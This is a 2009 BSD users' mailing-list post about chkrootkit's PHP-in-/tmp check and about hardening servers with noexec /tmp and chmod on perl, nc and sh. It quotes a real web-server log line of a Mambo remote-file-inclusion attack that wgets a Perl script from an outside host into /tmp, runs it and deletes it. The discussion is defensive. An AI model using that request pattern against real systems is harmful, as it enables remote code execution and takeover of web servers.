[nycbug-talk] Searching for suspect PHP files...

Andy Kosela akosela at andykosela.com
Tue Mar 3 15:51:42 EST 2009

Jesse Callaway <bonsaime at gmail.com> wrote:

> On Tue, Mar 3, 2009 at 4:22 AM, Andy Kosela <akosela at andykosela.com> wrote:
> > Max Gribov <max at neuropunks.org> wrote:
> >
> >> Matt Juszczak wrote:
> >> > Evening all,
> >> >
> >> >
> >> Hi Matt,
> >>
> >> > In my latest chkrootkit reports (which I run nightly via periodic), I'm
> >> > noticing lots and lots of "Suspect PHP Files" (via chkrootkit).  It seems,
> >> > after checking the code, that its really just searching for PHP files in
> >> > /tmp, and also searching for some other files throughout the system.
> >> >
> >> > I guess the question I have is - what's the point of this check?
> >> >
> >>
> >> /tmp is the default storage for uploaded files (before they get moved to
> >> their proper destination by some php code), and for php session data..
> >> All of this is tunable through php.ini.
> >>
> >> There are plenty of php-based backdoor scripts which allow to execute
> >> shell commands, transfer files, look at your db, etc.
> >> One of such things, and seems to be really popular, is rst shell
> >> http://www.sophos.com/security/analyses/viruses-and-spyware/trojrstdoora.html
> >
> > Yes, /tmp is the favorite directory of all www script kiddies and other
> > crackers.  Mounting it noexec can help a little bit, but I also disable
> > world x rights for perl, ssh, nc, sh, c, as, etc., so they won't be able
> Cool. How do you disable execution on those? I'm guessing the file
> permissions, but was hoping maybe you have some trick.

I use the simplest method which is chmod(1).  You can also employ for 
that BSD MAC framework.  The issue has been discussed recently on

Of course, those security techniques won't really help you with the more
sophisticated targeted attacks, but for the most part they help with the
majority which are non-targeted automated script attacks.

Consider this mambo abuse: - - [18/Aug/2006:13:58:02 -0300] "GET /index.php?_REQUEST[option]= com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/nokia-yes/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.freewebs.com/nokia-yes/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 167 "-" "Mozill a/5.0"

Those kind of attacks are real easy to deploy by automated bots that
scan large number of ip's.  They are non-targeted, but could be deadly 
as well.  Most of them just use perl(1) (run as www user) to launch a 
remote shell and then execute some rootkit.  By disabling execution of 
programs like perl(1) for the world, you definetly can stop those basic
type of attacks.  Even the simple changing of the default application 
path can help, as most of them use a simple http://host/application/ 


More information about the talk mailing list